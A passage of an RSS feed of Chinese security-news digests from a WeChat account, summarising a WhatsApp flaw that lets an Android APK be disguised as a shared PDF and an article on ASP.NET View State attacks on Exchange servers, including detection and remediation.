		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">2024年7月14日，一位恶意软件分析师发现了WhatsApp Messenger for Android的一个安全漏洞，攻击者可以通过API接口将恶意Android应用伪装成聊天中分享的PDF文件。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="1" data-w="32" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=92114cad&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2Ficqm3vRUymZmwZuG4Yf5KAoarDAr2Ip463lhdfich1Ovp5PJzw8aAiasRiaepAfOCnM9BiatrbAkI4scVcmeH4j6XSw%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46Ado8RgWo2ATVj3a0lQyabO9E5C0YDDibdoN7VG5aRiabYtgmsYJ6G5xg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46Ado8RgWo2ATVj3a0lQyabO9E5C0YDDibdoN7VG5aRiabYtgmsYJ6G5xg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5122488241184444"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">这个安全问题是通过WhatsApp的API接口来利用的，而不是通过直接在应用中发送附件。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">即使WhatsApp显示了正确的文件扩展名，对于不太熟悉技术的用户来说，这种方法也可能有效，因为他们可能不知道APK文件是Android应用程序的扩展名。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">WhatsApp在用户尝试打开可能含有有害内容的文档时会发出警告，但这个警告并没有明确指出文件可能是一个应用程序而不是文档。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">WhatsApp Web和Desktop版本不受这个问题的影响，因此使用电脑版的WhatsApp不会因为文件名的更改而下载或执行有害软件。</section></li></ul>
	<br/>
	<p>🏷️: WhatsApp, Android, 恶意软件, PDF, 安全漏洞</p></section><p><br/></p><figure style="-webkit-text-stroke-width: 0px;align-items: center;background-color: rgb(255, 255, 255);box-sizing: border-box;color: rgba(0, 0, 0, 0.85);display: flex;flex-direction: column;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;font-style: normal;font-variant-caps: normal;font-variant-ligatures: normal;font-weight: 400;justify-content: center;letter-spacing: normal;margin: 10px 0px;orphans: 2;padding: 0px;text-align: start;text-decoration-color: initial;text-decoration-style: initial;text-decoration-thickness: initial;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;">
	<figure><img height="420" data-w="930" style="border-radius: 4px;border-width: 3px;border-style: none;border-color: rgba(0, 0, 0, 0.4);box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing: border-box;display: block;margin: 0px;max-width: 100%;object-fit: fill;vertical-align: middle;" width="300" data-ratio="1.5548387096774194" src="https://wechat2rss.xlab.app/img-proxy/?k=5afdb0e5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46vfEibIH57REKzBPUKgDubRickg6g44OtmibSJ6Gaibr8icCItHpX9WyoJJw%2F640%3Fwx_fmt%3Djpeg"/></figure>
	<figcaption style="align-items:center;background-color:rgba(0, 0, 0, 0.7);box-sizing:border-box;color:white;display:flex;font-size:14px;font-weight:normal;justify-content:center;letter-spacing:0em;line-height:35px;margin:-35px 0px 0px;padding:0px;text-align:center;width:304px;z-index:20;">
		快来和老司机们一起学习吧</figcaption></figure><p style="display: none;"><mp-style-type data-value="10000"></mp-style-type></p>



<p><a href="2247487679">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=85802b49&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0MDcyMTMxOQ%3D%3D%26mid%3D2247487679%26idx%3D1%26sn%3D7e802630f8041f90bdddc6a282aa66f7%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 24 Jul 2024 11:37:00 +0800</pubDate>
    </item>
    <item>
      <title>「推安早报」0722 | exchange、漏洞赏金等</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0MDcyMTMxOQ==&amp;mid=2247487643&amp;idx=1&amp;sn=64eb3611770faf3c620745406fe40822</link>
      <description>「推安早报」0722 | exchange、漏洞赏金等</description>
      <content:encoded><![CDATA[<p>
<span>bggsec</span> <span>2024-07-22 09:09</span> <span style="display: inline-block;">中国香港</span>
</p>

<p>「推安早报」0722 | exchange、漏洞赏金等</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=f83f588c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZnI0TyTWFxr5ibibd88XNQwbicibsuBU1aFp7Xo4EzQ13UbyIWa554UGz60lxYTQwYibCibd5GZ81gOBsbA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="margin-bottom: 0px;padding-left: 10px;padding-right: 10px;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: auto;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;word-spacing: 0em;letter-spacing: 0em;word-break: break-word;text-align: left;">
	<h1 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;height: auto;justify-content: center;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: 100%;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 22px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;border-style: none none solid;border-width: 1px;border-radius: 0px;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;">2024-07-22 「红蓝热点」<span style="color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: right;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-size: 12px;">每天快人一步</span></span><span style="display: none;"></span></h1>
	<blockquote style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px solid rgba(0, 150, 136, 0.3);border-left-color: rgb(0, 150, 136);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span>
		<p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">
			1. 推送<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">「新、热、赞」</code>，帮部分人<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">阅读提效</code><br/>
			2. 学有<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">精读浅读深读</code>，艺有<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">会熟精绝化</code>，觉知此事<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">重躬行</code>。推送只在<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">浅读预览</code><br/>
			3. 机读为主，人工辅助，每日数万网站，10w推特速读<br/>
			4. 推送可能<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">大众或小众</code>，不代表本人偏好或认可<br/>
			5. 因渲染和外链原因，公众号<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">甲方安全建设</code>发送<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">日报</code>或日期,如<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">20240722</code>获取<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">图文评论版pdf</code>
		</p>
	</blockquote>
	<h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x01
			 利用视图状态漏洞攻击微软Exchange服务器</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页主要介绍了ASP.NET中的View State机制，以及如何利用View State进行攻击，包括在简单的Web应用程序和全面补丁的Microsoft Exchange 2019主机上的攻击手段。此外，还讨论了成功攻击后产生的证据、如何检测这些攻击，以及如何修复受影响的网络。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.15" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=d5de58aa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnI0TyTWFxr5ibibd88XNQwbicXNOXTITykZaXXPib9ktIonK05mymoJZzvTOniam2B1fs5icXdlbGgzQuQ%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.23395149786019973" data-w="701" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=c2890cd6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnI0TyTWFxr5ibibd88XNQwbicJfSGiaib2iceXjZzawGGt0c2AVOmuaJf6EQ1oMSTdFqYXD7dxwOQicAia5Q%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.5657407407407408" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=e6b2a429&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnI0TyTWFxr5ibibd88XNQwbicDkAX1trcBFNuQ9O72MwplKsdHf4EJlsJK1FysiccMx7zdm7BcsYYumQ%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
